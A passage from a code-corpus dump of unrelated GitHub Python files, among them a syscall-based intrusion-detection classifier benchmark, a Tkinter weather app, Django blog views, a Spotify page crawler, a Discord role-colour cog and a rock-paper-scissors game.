encontrada\")\n\n\ndef sliding_window_raw(seq):\n it = iter(seq)\n result = tuple(syscalls[line.split(\" \")[1] if line.startswith(\"---\") else line.split(\"(\")[0]][\"id\"] for line in islice(it, WINDOW_SIZE))\n if len(result) == WINDOW_SIZE:\n yield result\n for elem in it:\n if (elem.startswith(\"---\")):\n elem = elem.split(\" \")[1]\n result = result[1:] + (syscalls[elem.split(\"(\")[0]][\"id\"],)\n yield result\n\n\ndef retrieve_dataset(filename, filter):\n\n with open(filename, \"r\") as input_file:\n if filter == \"raw\":\n dataset = list(sliding_window_raw(input_file))\n else:\n dataset = list(sliding_window_filter(input_file))\n\n return dataset\n\n\ndef define_labels(base_normal, base_exec, multi):\n labels = []\n\n label_normal = LABEL_MULT_NORMAL if multi else LABEL_ONE_NORMAL\n label_anormal = LABEL_MULT_ANORMAL if multi else LABEL_ONE_ANORMAL\n\n for window in base_normal:\n labels.append(label_normal)\n\n for window in base_exec:\n labels.append(label_anormal)\n\n return labels\n\n\ndef get_features(version, filter=\"raw\"):\n\n path = FILES_PATH.format(v=version, b=\"normal\")\n base_normal = []\n base_exec = []\n\n for file in os.listdir(path):\n base_normal.extend(retrieve_dataset(os.path.join(path, file), filter))\n\n path = FILES_PATH.format(v=version, b=\"exec\")\n\n for file_exec in os.listdir(path):\n base_exec.extend(retrieve_dataset(os.path.join(path, file_exec), filter))\n\n return base_normal, base_exec\n\n\ndef naive_bayes(base_normal, base_exec):\n\n print(\"\\n> Naive Bayes\")\n\n results = []\n\n print(\"[...] Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, True)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n gnb = GaussianNB()\n gnb.fit(X_train, y_train)\n y_pred = gnb.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\"), recall_score(y_test, y_pred, average=\"binary\"), f1_score(y_test, y_pred, average=\"binary\"), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\ndef kneighbors(base_normal, base_exec):\n\n print(\"\\n> K-Nearest Neighbors\")\n\n results = []\n\n print(\"N_NEIGHBORS\", str(N_NEIGHBORS))\n\n print(\"[...] Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, True)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n knn = KNeighborsClassifier(n_neighbors=N_NEIGHBORS, n_jobs=-1)\n knn.fit(X_train, y_train)\n y_pred = knn.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\"), recall_score(y_test, y_pred, average=\"binary\"), f1_score(y_test, y_pred, average=\"binary\"), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\ndef random_forest(base_normal, base_exec):\n\n print(\"\\n> Random Forest\")\n\n results = []\n\n print(\"[...] Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, True)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n rfc = RandomForestClassifier(n_estimators=100, n_jobs=-1)\n\n rfc.fit(X_train, y_train)\n y_pred = rfc.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\"), recall_score(y_test, y_pred, average=\"binary\"), f1_score(y_test, y_pred, average=\"binary\"), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\ndef ada_boost(base_normal, base_exec):\n print(\"\\n> Ada Boost\")\n\n results = []\n\n print(\"[...] Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, True)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n abc = AdaBoostClassifier(base_estimator=RandomForestClassifier(n_jobs=-1))\n abc.fit(X_train, y_train)\n y_pred = abc.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\"), recall_score(y_test, y_pred, average=\"binary\"), f1_score(y_test, y_pred, average=\"binary\"), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\ndef multilayer_perceptron(base_normal, base_exec):\n print(\"\\n> Multilayer Perceptron\")\n\n results = []\n\n print(\"[...] Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, True)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n mlp = MLPClassifier()\n mlp.fit(X_train, y_train)\n y_pred = mlp.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\"), recall_score(y_test, y_pred, average=\"binary\"), f1_score(y_test, y_pred, average=\"binary\"), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\n# def linear_svc():\n# print(\"\\n> Linear SVC\")\n#\n# print(\"\\n[...] Retrieving datasets and labels\")\n# features,labels = get_features_labels()\n#\n# X_train,X_test,y_train,y_test = train_test_split(features, labels, test_size=0.5, random_state=42)\n#\n# lsvc = SVC()\n#\n# lsvc.fit(X_train, y_train)\n# y_pred = lsvc.predict(X_test)\n#\n# print(\"\\nf1_score: \", f1_score(y_test, y_pred, average=\"binary\"))\n# print(\"\\nrecall_score: \", recall_score(y_test, y_pred, average=\"binary\"))\n# print(\"\\nprecision_score: \", precision_score(y_test, y_pred, average=\"binary\"))\n# print(\"\\n\")\n#\n# return lsvc\n\ndef one_class_svm(base_normal, base_exec):\n print(\"\\n> One Class SVM\")\n\n results = []\n\n print(\"[...] Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, False)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n onesvm = OneClassSVM(gamma=\"scale\", nu=0.01)\n trainX = []\n for x, y in zip(X_train, y_train):\n if (y == 1):\n trainX.append(x)\n\n onesvm.fit(trainX)\n y_pred = onesvm.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\", pos_label=-1), recall_score(y_test, y_pred, average=\"binary\", pos_label=-1), f1_score(y_test, y_pred, average=\"binary\", pos_label=-1), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\ndef isolation_forest(base_normal, base_exec):\n\n print(\"\\n> Isolation Forest\")\n\n results = []\n\n print(\"[...] Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, False)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n clf = IsolationForest(n_jobs=-1)\n trainX = []\n for x, y in zip(X_train, y_train):\n if (y == 1):\n trainX.append(x)\n\n clf.fit(trainX)\n y_pred = clf.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\", pos_label=-1), recall_score(y_test, y_pred, average=\"binary\", pos_label=-1), f1_score(y_test, y_pred, average=\"binary\", pos_label=-1), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"window_size\", help=\"Window size\", type=int)\n parser.add_argument(\"-d\", \"--dataset\", help=\"Dataset version to use\", choices=[\"sbseg\", \"iscc\"], default=\"iscc\")\n parser.add_argument(\"-f\", \"--filter\", help=\"Filter mode\", choices=[\"raw\", \"filter\"], default=\"raw\")\n args = parser.parse_args()\n\n if args.window_size <= 0:\n raise argparse.ArgumentTypeError(\"window_size must be greater than 0\")\n\n WINDOW_SIZE = args.window_size\n\n print(\" \".join((\"\\n --- WINDOW_SIZE =\", str(WINDOW_SIZE), \"({}) --- \\n\".format(args.filter))))\n\n base_normal, base_exec = get_features(args.dataset, args.filter)\n\n naive_bayes(base_normal, base_exec)\n kneighbors(base_normal, base_exec)\n random_forest(base_normal, base_exec)\n multilayer_perceptron(base_normal, base_exec)\n ada_boost(base_normal, base_exec)\n\n one_class_svm(base_normal, base_exec)\n isolation_forest(base_normal, base_exec)\n","repo_name":"gabrielruschel/hids-docker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12198,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"17265831470","text":"import tkinter as tk\nimport requests\nimport time\n#==============================#\ndef getweather(canvas):\n city=textfield.get()\n api=\"http://api.openweathermap.org/data/2.5/weather?q=\" + city + \"&appid=Keys\"\n json_data=requests.get(api).json()\n condition=json_data['weather'][0]['main']\n temp=int(json_data['main']['temp'] - 273.15)\n min_temp=int(json_data['main']['temp_min'] - 273.15)\n max_temp=int(json_data['main']['temp_max'] - 273.15)\n pressure=json_data['main']['pressure']\n humidity=json_data['main']['humidity']\n wind=json_data['wind']['speed']\n sunrise=time.strftime(\"%I:%M:%S\" , time.gmtime(json_data['sys']['sunrise'] - 21600))\n sunset=time.strftime(\"%I:%M:%S\" , time.gmtime(json_data['sys']['sunset'] - 21600))\n\n final_info=condition+'\\n'+str(temp)+\"ْ C\"\n final_data='\\n'+'Max Temp: '+str(max_temp)+'\\n'+'Min Temp: '+str(min_temp)+'\\n'+'Pressure: '+str(pressure)\\\n +'\\n'+'Humidity: '+str(humidity)+'\\n'+'Wind speed: '+str(wind)+'\\n'+'Sunrise: '\\\n +str(sunrise)+'\\n'+'Sunset: '+str(sunset)\n label1.config(text = final_info)\n label2.config(text = final_data)\n#==============================#\ncanvas = tk.Tk()\ncanvas.geometry('600x400') ; canvas.title(\"Weather\")\ntextfield = tk.Entry(canvas , font=(\"tahoma\",20)) ; textfield.pack(pady=20)\ntextfield.focus() ; textfield.bind('' , getweather)\nlabel1=tk.Label(canvas,font=(\"tahoma\",20)) ; label1.pack()\nlabel2=tk.Label(canvas,font=(\"tahoma\",15)) ; label2.pack()\ncanvas.mainloop()\n","repo_name":"Hidden0612/Weather-App-In-Python","sub_path":"Weather App In Python.py","file_name":"Weather App In Python.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"8212136038","text":"import pandas as pd\nfrom lib import filedb\n\nbasedir = \"/media/nmurphy/BF_Data_Orange/datasets/new_strain_snaps1/\"\ncell_df = pd.read_hdf(os.path.join(basedir, \"single_cell_data.h5\"), \"cells\")\nfile_df = filedb.get_filedb(os.path.join(basedir, \"file_list.tsv\"))\n\n\ndef is_a_good_cell(v, mean = 10300, std = 3500):\n if (v < mean + std) & (v > mean - std):\n return True\n else:\n return False\n\ncell_df[\"good_cell\"] = cell_df[\"red_raw_mean\"].apply(is_a_good_cell)\ncell_df_filter = cell_df.loc[cell_df[\"good_cell\"], :]","repo_name":"npmurphy/biofilm_pulse","sub_path":"notebooks/sigb_histograms/load_63x_data.py","file_name":"load_63x_data.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22865410879","text":"while True:\n import string\n\n # LOWER PART\n try:\n size = int(input('Enter the amount of alphabeths you want: '))\n\n left_hand_side_length = size\n width = ((size + (size - 1)) * 2) - 1\n List = list(string.ascii_lowercase)\n count = 1\n counter = 0\n sliced_list = (List[:size])\n sliced_list.reverse()\n reference_number = 1\n referenced_number = 0\n\n # UPPER PART\n\n while reference_number != size:\n new_list = (sliced_list[counter:referenced_number])\n new_list.reverse()\n Rangoli_pattern = (sliced_list[:reference_number] + new_list)\n reference_number += 1\n referenced_number += 1\n print(('-'.join(Rangoli_pattern).center(width, '-')))\n\n # LOWER PART\n\n while size > 0:\n new_list = (List[count:left_hand_side_length])\n Rangoli_pattern = (sliced_list[:size] + new_list)\n count += 1\n size -= 1\n print(('-'.join(Rangoli_pattern).center(width, '-')))\n redo = input('Y/N:' )\n if redo == 'y':\n break\n else:\n continue\n except ValueError:\n print('not found')","repo_name":"Kehinde-Ajasa/SOLUTIONS_TO_CODING_CHALLENGES_ON_HACKERRANK","sub_path":"RAGNOLI.py","file_name":"RAGNOLI.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22966250906","text":"def counting(A, m):\r\n n = len(A)\r\n count = [0] * (m + 1)\r\n for k in range(n):\r\n count[A[k]] += 1\r\n return count\r\n\r\n\r\ndef slow_solution(A, B, m):\r\n n = len(A)\r\n sum_a = sum(A)\r\n sum_b = sum(B)\r\n for i in range(n):\r\n for j in range(n):\r\n change = B[j] - A[i]\r\n sum_a += change\r\n sum_b -= change\r\n if sum_a == sum_b:\r\n return True\r\n sum_a -= change\r\n sum_b += change\r\n return False\r\n\r\n\r\ndef fast_solution(A, B, m):\r\n n = len(A)\r\n sum_a = sum(A)\r\n sum_b = sum(B)\r\n d = sum_b - sum_a\r\n if d % 2 == 1:\r\n return False\r\n d //= 2\r\n count = counting(A, m)\r\n for i in range(n):\r\n if 0 <= B[i] - d <= m and count[B[i] - d] > 0:\r\n return True\r\n return False\r\n\r\nv = [0, 0, 4, 2, 4, 5]\r\nres = counting(v, max(v))\r\ns = 0\r\nfor i, e in enumerate(res):\r\n s += i * e\r\n print(\"Count of\", i, \"=\", e)\r\nprint(s == sum(v))\r\n","repo_name":"totid/codility","sub_path":"lesson-2-countingelements.py","file_name":"lesson-2-countingelements.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23035652727","text":"import torch\nimport numpy as np\n\ndef preproc_state(state): # 资料预处理函数\n p_state = torch.from_numpy(state).unsqueeze(dim=0).float()\n p_state = torch.nn.functional.normalize(p_state,dim=1) # 将状态中的数值正规化至0-1之间\n return p_state\n\ndef get_action(dist,support): # 动作选择策略函数\n actions = []\n for b in range(dist.shape[0]): # 以回圈的形式批次走访分布维度上的资料\n expectations = [support @ dist[b,a:] for a in range(dist.shape[1])] # 计算每个动作价值分布的期望值\n action = int(np.argmax(expectations))\n actions.append(action)\n actions = torch.Tensor(actions).int()\n return actions\n","repo_name":"YingnanHan/Deep-Reinforcement-Learning-in-Action---Alexander-Zai","sub_path":"Chapter07 分散式DQN/11.对状态资料进行预处理,并决定选择动作策略.py","file_name":"11.对状态资料进行预处理,并决定选择动作策略.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"18287660334","text":"from django.shortcuts import render, get_object_or_404\nfrom django.utils import timezone\nfrom .models import Post, Categoria, SubCategoria, Countries\n\ndef viaje(request):\n\t# posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n\tcountrySet = Countries.objects.all()\n\treturn render(request,'viaje.html',{'countrySet': countrySet})\t\n\ndef post_ver(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\n\tcontext = {\n\t\t'post': post\n\t}\n\treturn render(request,'posts_details.html',context)\n\n\n\ndef countryView(request, pk):\n\tcountry = get_object_or_404(Countries, pk=pk)\n\n\tif country.has_category:\n\t\tcategorySet = Categoria.objects.filter(country=country)\n\n\t\tcontext = {\n\t\t\t'categorySet': categorySet\n\t\t}\n\t\treturn render(request,'categories.html',context)\n\telse:\n\t\tpostSet = Post.objects.filter(country=country)\n\t\tcontext = {\n\t\t\t'postSet': postSet\n\t\t}\n\t\treturn render(request,'posts.html',context)\n\n\ndef categoryView(request, pk):\n\tcategoria = get_object_or_404(Categoria, pk=pk)\n\n\tif categoria.has_sub_category:\n\t\tsubCategoriaSet = SubCategoria.objects.filter(categoria=categoria)\n\n\t\tcontext = {\n\t\t\t'subCategoriaSet': subCategoriaSet\n\t\t}\n\t\treturn render(request,'subcategories.html',context)\n\telse:\n\t\tpostSet = Post.objects.filter(categoria=categoria)\n\t\tcontext = {\n\t\t\t'postSet': postSet\n\t\t}\n\t\treturn render(request,'posts.html',context)\n\n\ndef subCategoryView(request, pk):\n\tsubCategoria = get_object_or_404(SubCategoria, pk=pk)\n\n\tpostSet = Post.objects.filter(sub_categoria=subCategoria)\n\tcontext = {\n\t\t'postSet': postSet\n\t}\n\treturn render(request,'posts.html',context)","repo_name":"cristianjs19/viaje-blog","sub_path":"crea_post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"69824385194","text":"from disk import diskset, diskqueue, pagequeue\nfrom aiohttp.client import ClientSession\nfrom collections import defaultdict\nfrom tqdm import tqdm\n\nimport argparse\nimport requests\nimport aiohttp\nimport asyncio\nimport time\nimport re\nimport os\n\ndomain = \"https://open.spotify.com/\"\n\npage_expr = re.compile(r'https://open\\.spotify\\.com/(?!(?:intl|oembed)\\b)([^\\s\"\\']+)^\\?')\nslug_expr = re.compile(r'/(track|album|artist|playlist|concert|episode|show|genre)/([0-9a-zA-Z]{22})')\nuser_expr = re.compile(r'/user/([0-9a-z]{28})')\n\nstatus_messages = {429: \"Too many requests\", 500: \"Internal Server Error\", 503: \"Service unavailable\", 504: \"Gateway timeout\"}\n\ndef parse_args():\n parser = argparse.ArgumentParser(description = \"Scrape Spotify\")\n parser.add_argument(\"--root\", default = \"run\", help = \"Root directory to store data\")\n args = parser.parse_args()\n return args\n\ndef process(url, html, code):\n try:\n if code == 200:\n pages = set(re.findall(page_expr, html))\n results = defaultdict(set)\n\n for slug, id in re.findall(slug_expr, html):\n results[slug].add(id)\n\n for id in re.findall(user_expr, html):\n results[\"user\"].add(id)\n\n for slug, identifiers in results.items():\n for id in identifiers:\n page = slug + '/' + id\n pages.add(page)\n\n return pages, results\n elif code in status_messages.keys():\n message = status_messages[code]\n print(f\"{message} when accessing {url}. Retrying in 0.1 seconds...\")\n time.sleep(0.1)\n else:\n print(f\"Failed to access {url}. Status code: {code}\")\n return set(), dict()\n except KeyboardInterrupt:\n raise\n except Exception as e:\n print(f\"Error while scraping {url}: {str(e)}\")\n return set(), dict()\n \nasync def request(page, session):\n url = domain + page\n async with session.get(url) as response:\n html = await response.text()\n return process(url, html, response.status)\n \nasync def scrape(pages):\n connection = aiohttp.TCPConnector(limit = 64)\n\n async with ClientSession(connector = connection) as session:\n tasks = []\n\n for page in pages:\n task = asyncio.ensure_future(request(page, session))\n tasks.append(task)\n\n pbar = tqdm(total = len(pages), desc = \"Requesting URLs\", unit = \" tracks\", leave = False)\n outputs = []\n\n for output in asyncio.as_completed(tasks):\n try:\n value = await output\n\n if value is not None:\n outputs.append(value)\n except Exception as e:\n raise e\n continue\n finally:\n pbar.update(1)\n\n return outputs\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n os.makedirs(f\"{args.root}/queues/pages\", exist_ok = True)\n \n page_input_queue = pagequeue(f\"{args.root}/queues/pages/input.db\")\n page_output_queue = pagequeue(f\"{args.root}/queues/pages/output.db\")\n result_queue = diskqueue(f\"{args.root}/queues/results.db\")\n\n visited = diskset(f\"{args.root}/pages.db\")\n results = {key: diskset(f\"{args.root}/{key}.db\") for key in diskqueue.SLUG_MAPPING.keys()}\n\n if len(page_input_queue) == 0:\n page_input_queue.put(\"track/6fxbtIuYVYl37ynRqEfMcc\")\n\n last_time = time.time()\n round = 0\n \n batch_size = 4096\n\n while True:\n length = len(page_input_queue)\n for _ in tqdm(range(length // batch_size + 1)):\n pages = page_input_queue.get_batch(min(batch_size, len(page_input_queue)))\n\n all_pages = []\n all_results = []\n\n for pages, outputs in asyncio.run(scrape(pages)):\n all_pages.extend(pages)\n\n for slug, identifiers in outputs.items():\n for id in identifiers:\n all_results.append((slug, id))\n\n page_output_queue.extend(all_pages)\n result_queue.extend(all_results)\n\n length = len(page_output_queue)\n for _ in tqdm(range(length // batch_size + 1)):\n urls = page_output_queue.get_batch(min(batch_size, len(page_output_queue)))\n new_urls = []\n for url in urls:\n if url not in visited:\n new_urls.append(url)\n visited.extend(new_urls)\n page_input_queue.extend(new_urls)\n\n length = len(result_queue)\n for _ in tqdm(range(length // batch_size + 1)):\n slugs, hashes = result_queue.get_batch(min(batch_size, len(result_queue)))\n unique_items = defaultdict(set)\n for slug, hash in zip(slugs, hashes):\n if hash not in results[slug]:\n unique_items[slug].add(hash)\n for slug, identifiers in unique_items.items():\n results[slug].extend(identifiers)\n\n last_time = time.time()\n message = \", \".join(key + \": \" + str(len(results[key])) for key in diskqueue.SLUG_MAPPING.keys())\n print(f\"(Round #{round})\", message)\n print(len(page_input_queue), len(page_output_queue), len(result_queue))\n round += 1","repo_name":"ryanrudes/spotify","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15247962849","text":"\r\ndef executer_calcul(entrees):\r\n\tN=entrees[0]\r\n\tparties=entrees[1]\r\n\tCase=entrees[2]\r\n\tresult=''\r\n\twhile (sum(parties)>0):\r\n\t\tevac1=maximum(parties)\r\n\t\tparties[evac1]=parties[evac1]-1\r\n\t\tevac2=maximum(parties)\r\n\t\tif(2*parties[evac2]>sum(parties)):\r\n\t\t\tparties[evac2]=parties[evac2]-1\r\n\t\t\tresult=result+' '+chr(evac1+65)+chr(evac2+65)\r\n\t\telse:\r\n\t\t\tresult=result+' '+chr(evac1+65)\r\n\treturn result\r\n\r\ndef maximum(liste):\r\n\tmaximum=0\r\n\tfor i in range(len(liste)):\r\n\t\tif(liste[i]>liste[maximum]): maximum=i\r\n\treturn maximum\r\n\r\n# Main\r\nmultiprocessed=False # Décide si l'on parallélise les calculs pour gagner du temps\r\nif (multiprocessed): from multiprocessing import Pool\r\nelse: output = open('Output.txt','w')\r\nif ((not multiprocessed) or __name__ == '__main__'):\r\n\twith open(\"Input.txt\", \"r\") as input:\r\n\t\tlines=input.readlines()\r\n\tT=int(lines[0])\r\n\tline=1\r\n\tCase=1\r\n\tcalculs=[]\r\n\twhile(line.json|.yaml)$', schema_view.without_ui(), name='schema_swagger'),\n\n # Serving static media in Django to pipe it through LoginRequiredMiddleware\n path(r'media/', serve, {'document_root': settings.MEDIA_ROOT}),\n\n # Admin\n path(r'admin/', admin_site.urls),\n\n]\n\nif settings.WEBHOOKS_ENABLED:\n _patterns += [\n path(r'admin/webhook-backend-status/', include('django_rq.urls')),\n ]\n\nif settings.DEBUG:\n import debug_toolbar\n _patterns += [\n path(r'__debug__/', include(debug_toolbar.urls)),\n ]\n\nif settings.METRICS_ENABLED:\n _patterns += [\n path('', include('django_prometheus.urls')),\n ]\n\n# Prepend BASE_PATH\nurlpatterns = [\n path(r'{}'.format(settings.BASE_PATH), include(_patterns))\n]\n\nhandler500 = 'utilities.views.server_error'\n","repo_name":"mtbutler07/netbox-heroku","sub_path":"netbox/netbox/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6406282642","text":"import discord\nfrom discord.ext import commands\n\nfrom manibot import Cog, command\n\n\ncolour_roles = {\n 302958707241648128: {\n 312126115273506817: 334811709053206540, # ron\n 146430655197216769: 304510376509177856, # kuka\n 214932117287600128: 312297405175562250 # hati\n },\n 351755506341117954: {\n 174764205927432192: 351758043643510788 # scragly test role\n }\n}\n\n\ndef has_colour_role(ctx):\n gcr = colour_roles.get(ctx.guild.id)\n if not gcr:\n return False\n mcr = gcr.get(ctx.author.id)\n if mcr:\n return True\n return False\n\n\nclass RoleColours(Cog):\n\n @command()\n @commands.check(has_colour_role)\n async def setcolour(self, ctx, colour: discord.Colour = None):\n \"\"\"Allows you to adjust your unique colour role value.\n\n Accepts the following colour hex formats:\n 0x, #, 0x#\n\n Also accepts the following preset colours:\n default, teal, dark_teal, green, dark_green, blue, dark_blue,\n purple, dark_purple, magenta, dark_magenta, gold, dark_gold,\n orange, dark_orange, red, dark_red, lighter_grey, dark_grey,\n light_grey, darker_grey, blurple, greyple.\n \"\"\"\n if not colour:\n return await ctx.embed(\n ctx.author.top_role.colour,\n colour=ctx.author.top_role.colour)\n\n role = ctx.get.role(colour_roles[ctx.guild.id][ctx.author.id])\n\n try:\n await role.edit(colour=colour)\n except discord.Forbidden:\n is_hier = ctx.guild.me.top_role.position < role.position\n if is_hier:\n return await ctx.error(\n \"I don't have enough permission to edit that role.\",\n (\"Your colour role is positioned higher than my top \"\n \"role.\\nEither ensure my top role is positioned higher \"\n \"than it, or change the colour manually.\"))\n else:\n return await ctx.error(\n \"I don't have enough permission to edit that role.\")\n await ctx.success(f\"{role.name} role changed to colour: {colour}\")\n","repo_name":"scragly/Manibot","sub_path":"manibot/cogs/colours/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14904745842","text":"#!/usr/bin/env python\n\n'''\nConverts report files to CSV format.\n'''\n\n__author__ = 'Aditya Viswanathan'\n__email__ = 'aditya@adityaviswanathan.com'\n\nimport csv\nimport os\nimport xlrd\n\ndef xlsx_to_csv(path_name, file_name, ext, folder=''):\n wb = xlrd.open_workbook(path_name)\n # Below is a HACK that assumes the first sheet in the excel workbook\n # is the one that is to be processed.\n sheet = wb.sheet_by_index(0)\n csv_file = open((folder + '/' if folder else folder) +\n file_name + '.csv', 'w')\n csv_file_name = os.path.basename(csv_file.name)\n if os.path.isfile(csv_file.name):\n print('Overwriting existing CSV file ' + csv_file_name + '.');\n csv_writer = csv.writer(csv_file, quoting=csv.QUOTE_ALL)\n print('Converting {name}.{ext} to CSV via temp file {csv}'\n .format(name=file_name, ext=ext, csv=csv_file_name))\n for row_index in range(sheet.nrows):\n csv_writer.writerow(sheet.row_values(row_index))\n csv_file.close()\n return csv_file.name\n\ndef could_not_convert(path_name, file_name, ext, folder=''):\n raise Exception('Cannot convert file with extension {ext} to CSV'\n .format(ext=ext))\n\ndef to_csv(path, folder):\n name, ext = os.path.splitext(os.path.basename(path))\n if not os.path.exists(folder):\n os.makedirs(folder)\n switcher = {\n '.xlsx' : xlsx_to_csv\n }\n converter = switcher.get(ext, could_not_convert)\n return converter(path, name, ext, folder)\n","repo_name":"adityaviswanathan/dashboard","sub_path":"report_utils/to_csv.py","file_name":"to_csv.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71183404393","text":"import random as r\nimport time as t\n\noptions = {\n 1: {'name': 'Rock', 'image': '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''},\n 2: {'name': 'Paper', 'image': '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''},\n 3: {'name': 'Scissors', 'image': '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''}\n}\n\nclear_screen_command = '\\033[H\\033[J';\n\ndef playRockPaperScissors():\n print('''\n \n.---. .-. .---. .--. _ \n: .; : : :.-. : .; : : .--' :_; \n: .'.--. .--.: `'.' : _..--. .---. .--..--. `. `. .--..-..--. .--. .--..--. .--. \n: :.`' .; ' ..: . `. : : ' .; ;: .; ' '_.: ..' _`, ' ..: `._-.`._-.' .; : ..`._-.'\n:_;:_`.__.`.__.:_;:_; :_; `.__,_: ._.`.__.:_; `.__.`.__.:_`.__.`.__.`.__.:_; `.__.'\n : : \n :_; \n \n ''')\n \n print(\"First player to reach a score of 5 wins the game.\");\n\n user_score = 0;\n cpu_score = 0;\n round_count = 1;\n\n while user_score < 5 and cpu_score < 5:\n print(f\"\\nRound {round_count}\")\n print(f\"Scores:\\nUser: {user_score}\\tCPU: {cpu_score}\\n\")\n user_option = int(input(\"Choose:\\n1: Rock\\t2: Paper 3: Scissors\\n>> \"))\n cpu_option = r.randint(1, 3)\n user_choice = options[user_option]\n cpu_choice = options[cpu_option]\n\n print(\"User:\")\n print(user_choice['image'])\n t.sleep(1) # Add a delay of 1 second\n\n print(\"CPU:\")\n print(cpu_choice['image'])\n t.sleep(1) # Add a delay of 1 second\n\n if user_option == cpu_option:\n print(\"This was a draw!\\n\")\n elif (user_option == 1 and cpu_option == 3) or (user_option == 2 and cpu_option == 1) or (user_option == 3 and 